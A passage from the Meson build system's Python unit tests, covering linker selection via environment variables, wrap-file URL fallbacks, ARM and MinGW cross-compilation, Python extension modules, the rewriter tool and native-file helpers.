# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write(textwrap.dedent('''\
[binaries]
c = ['{}']
'''.format(os.path.join(testdir, 'host_wrapper.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '67 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = [f'-Dc_link_args=-L{libdir}',
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '67 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest(f'Could not find {check}.')
envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP[f'{lang}_ld']]
# Also test a deprecated variable if there is one.
if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
envvars.append(
mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler,
mesonbuild.compilers.AppleClangObjCCompiler,
mesonbuild.compilers.AppleClangObjCPPCompiler)):
raise unittest.SkipTest('AppleClang is currently only supported with ld64')
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
f'Compiler {comp.id} does not support using alternative linkers')
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
@skipIfNoExecutable('ld.gold') # need an additional check here because _check_ld checks for gcc
def test_ld_environment_variable_rust(self):
self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
if is_osx():
expected = 'ld64'
else:
expected = 'ld.lld'
self._check_ld('ld.lld', 'lld', 'd', expected)
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write test project where the first dependency() returns not-found
# because 'broken' subproject does not exit, but that should not prevent
# the 2nd dependency() to lookup on system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '77 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
def test_prelinking(self):
# Prelinking currently only works on recently new GNU toolchains.
# Skip everything else. When support for other toolchains is added,
# remove limitations as necessary.
if is_osx():
raise unittest.SkipTest('Prelinking not supported on Darwin.')
if 'clang' in os.environ.get('CC', 'dummy'):
raise unittest.SkipTest('Prelinking not supported with Clang.')
gccver = subprocess.check_output(['cc', '--version'])
if b'7.5.0' in gccver:
raise unittest.SkipTest('GCC on Bionic is too old to be supported.')
testdir = os.path.join(self.unit_test_dir, '87 prelinking')
self.init(testdir)
self.build()
outlib = os.path.join(self.builddir, 'libprelinked.a')
ar = shutil.which('ar')
self.assertTrue(os.path.exists(outlib))
self.assertTrue(ar is not None)
p = subprocess.run([ar, 't', outlib],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True, timeout=1)
obj_files = p.stdout.strip().split('\n')
self.assertEqual(len(obj_files), 1)
self.assertTrue(obj_files[0].endswith('-prelink.o'))
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '76 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def test_run_native_test(self):
'''
https://github.com/mesonbuild/meson/issues/7997
check run native test in crossbuild without exe wrapper
'''
testdir = os.path.join(self.unit_test_dir, '88 run native test')
stamp_file = os.path.join(self.builddir, 'native_test_has_run.stamp')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(stamp_file)
self.run_tests()
self.assertPathExists(stamp_file)
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
error_message = "An exe_wrapper is needed but was not found. Please define one in cross file and check the command and/or add it to PATH."
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
self.assertEqual(str(cm.exception), error_message)
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.assertEqual(str(cm.exception), error_message)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaises(MesonException) as cm:
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
self.assertEqual(str(cm.exception),
"The exe_wrapper defined in the cross file 'broken' was not found. Please check the command and/or add it to PATH.")
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'Skipping python tests with {self.backend.name} backend')
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD', 'Boost']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': 'debug=true'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, f'generated{self.current_config}.config')
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write(f'[{section}]\n')
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write(f"{k}={v}\n")
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join([f"'{w}'" for w in v])))
else:
f.write(f"{k}='{v}'\n")
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, f'binary_wrapper{self.current_wrapper}.py')
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(f' if args.{name}:\n')
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, f'binary_wrapper{self.current_wrapper}.bat')
with open(batfile, 'wt') as f:
f.write(fr'@{sys.executable} {filename} %*')
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, f'detect_{lang}_compiler')
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
